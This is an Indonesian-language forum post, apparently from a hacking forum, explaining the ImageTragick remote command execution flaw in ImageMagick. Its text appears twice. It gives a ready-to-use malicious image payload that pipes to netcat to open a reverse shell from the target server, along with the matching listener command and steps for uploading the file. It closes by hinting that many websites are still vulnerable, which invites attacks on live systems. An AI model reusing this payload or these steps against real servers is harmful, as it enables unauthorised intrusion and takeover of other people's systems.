Imagetragickk Imagetragickk lebih dari TV BOOM!!
wkwkwkk
Mungkin udah pada yg tau kan yaa exploit yg satu ini...
Yapp benar, exploit pada salah satu vulnerability ImageMagick.
Seperti yg baru-baru kemarin ramai diperbincangkan di Dunia IT-Se{curi}ty an, soal Start-Up yg kena exploit ini.
(kalo yg belom baca disini)
Nahh disini ane cuma sedikit menjelaskan buat yg belum tahu, kenapa itu exploit Imagetragick bisa terjadi. (Kalo yg udah tau, mohon dikoreksi yaaa
)
Jadi, Imagetragick itu terjadi karena ada salah satu vulnerability pada Imagemagick yang apabila kita sisipkan url https:// pada image/gambar didalam nya, nanti bakalan ada error pada si Imagemagick-nya. Nahh dari error tersebut, ternyata setelah nya di eval, jadi mangkannya kita bisa mengeksekusi command (RCE) pada server si target.
Seperti itu
Begini contoh script image exploit nya
Jadi, setelah url kita kasih pipeline "|" lalu setelah itu bisa kita masukkan command yang kita ingin eksekusi.
Disitu contoh nya kita ingin bekonak-in server target ke kita.
Namun, kita juga harus mengeksekusi command berikut jika ingin bekonak.
ket: 31337 itu port yang akan kita listen. jadi harus sama seperti yang ada discript injeksi sebelumnya.
Lalu upload script image yg tadi kita sudah buat ke server target
![[Image: img.png]](https://s32.postimg.org/dn7oh38md/img.png)
Dann kita lihat pada sisi kita (client) yang sudah me-listen port sebelumnya..
![[Image: img_magik.png]](https://s31.postimg.org/ndyhcjewb/img_magik.png)
Voilaaa~ kita berhasil bekonak dari server target. Kita bisa langsung menjalakan command-command yang lain nya jika sudah seperti ini
![[Image: img_magik2.png]](https://s32.postimg.org/e5ht2235x/img_magik2.png)
Yaa untuk lebih jelasnya untuk exploit ini, bisa baca-baca disini
Cukup sekian, dan tetap Learn and Share!! \m/
***
Nb: Rumor-rumor yang beredar di Dunia Underground sana, masih banyak web-web yang rentan terhadap Vulnerability ini. Jadii.... (if you know what i mean)
wkwkwkk
Mungkin udah pada yg tau kan yaa exploit yg satu ini...
Yapp benar, exploit pada salah satu vulnerability ImageMagick.
Seperti yg baru-baru kemarin ramai diperbincangkan di Dunia IT-Se{curi}ty an, soal Start-Up yg kena exploit ini.
(kalo yg belom baca disini)
Nahh disini ane cuma sedikit menjelaskan buat yg belum tahu, kenapa itu exploit Imagetragick bisa terjadi. (Kalo yg udah tau, mohon dikoreksi yaaa
)Jadi, Imagetragick itu terjadi karena ada salah satu vulnerability pada Imagemagick yang apabila kita sisipkan url https:// pada image/gambar didalam nya, nanti bakalan ada error pada si Imagemagick-nya. Nahh dari error tersebut, ternyata setelah nya di eval, jadi mangkannya kita bisa mengeksekusi command (RCE) pada server si target.
Seperti itu
Begini contoh script image exploit nya
Code:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/ipinganteng.jpg" | nc -e /bin/sh IP-Kita "PORT)'
pop graphic-contextJadi, setelah url kita kasih pipeline "|" lalu setelah itu bisa kita masukkan command yang kita ingin eksekusi.
Disitu contoh nya kita ingin bekonak-in server target ke kita.
Namun, kita juga harus mengeksekusi command berikut jika ingin bekonak.
Code:
nc -lvvp 31337Lalu upload script image yg tadi kita sudah buat ke server target
Dann kita lihat pada sisi kita (client) yang sudah me-listen port sebelumnya..
Voilaaa~ kita berhasil bekonak dari server target. Kita bisa langsung menjalakan command-command yang lain nya jika sudah seperti ini
Yaa untuk lebih jelasnya untuk exploit ini, bisa baca-baca disini
Cukup sekian, dan tetap Learn and Share!! \m/
***
Nb: Rumor-rumor yang beredar di Dunia Underground sana, masih banyak web-web yang rentan terhadap Vulnerability ini. Jadii.... (if you know what i mean)
"pertarungan terbaik adalah menghindarinya"
--KURAWA--
